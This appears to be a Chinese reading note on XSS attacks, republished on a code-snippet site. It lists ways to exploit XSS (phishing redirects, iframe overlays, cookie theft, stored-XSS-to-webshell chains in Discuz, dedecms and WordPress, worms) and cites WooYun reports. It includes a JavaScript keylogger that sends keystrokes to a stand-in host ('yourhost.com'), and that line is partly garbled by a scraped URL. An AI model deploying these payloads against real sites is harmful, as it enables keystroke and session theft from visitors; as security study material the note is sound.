首页 > 代码库 > xss跨站脚本攻击与防御读书笔记(原创)
xss跨站脚本攻击与防御读书笔记(原创)
XSS在客户端执行 可以任意执行js代码
0x01 xss 的利用方式
1. 钓鱼 案例:http://www.wooyun.org/bugs/wooyun-2014-076685 我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动到前台的
2.钓鱼,伪造操作界面钓鱼
直接跳转
<script>document.location.href="http://test.com/xxx.htm"
iframe钓鱼
<iframe src="http://test.com/11.htm" heigt="100%" width="100%">
flash钓鱼
http://www.wooyun.org/bugs/wooyun-2010-02532
3.弹广告刷流量
4.任意POST/GET操作
如在dz中 后台的储存型XSS可以get uckey,或者get webshell 案例
http://www.wooyun.org/bugs/wooyun-2010-045716
在dedecms中 一个储存XSS配合后台文件管理器 getshell
案例: dedecms利用xss+csrf getshell
http://huakai.paxmac.org/?p=587
wordpess中储存XSS配合模板getshell
5.html5 中还可以截图
6.窃取cookies
XSS盲打类的
7.XSS键盘记录
var keys=‘‘;document.onkeypress = function(e)
{ get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;}window.setInterval(function()
{
new Image().src = http://www.mamicode.com/‘http://yourhost.com/g.php?c=‘+keys; keys = ‘‘;}, 1000);>
8.客户端信息的刺探
扫描内网
自动提交st2漏洞(案列在黑哥的PPT里面)
ip地址
9.xssworm
10.ddos
xss跨站脚本攻击与防御读书笔记(原创)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。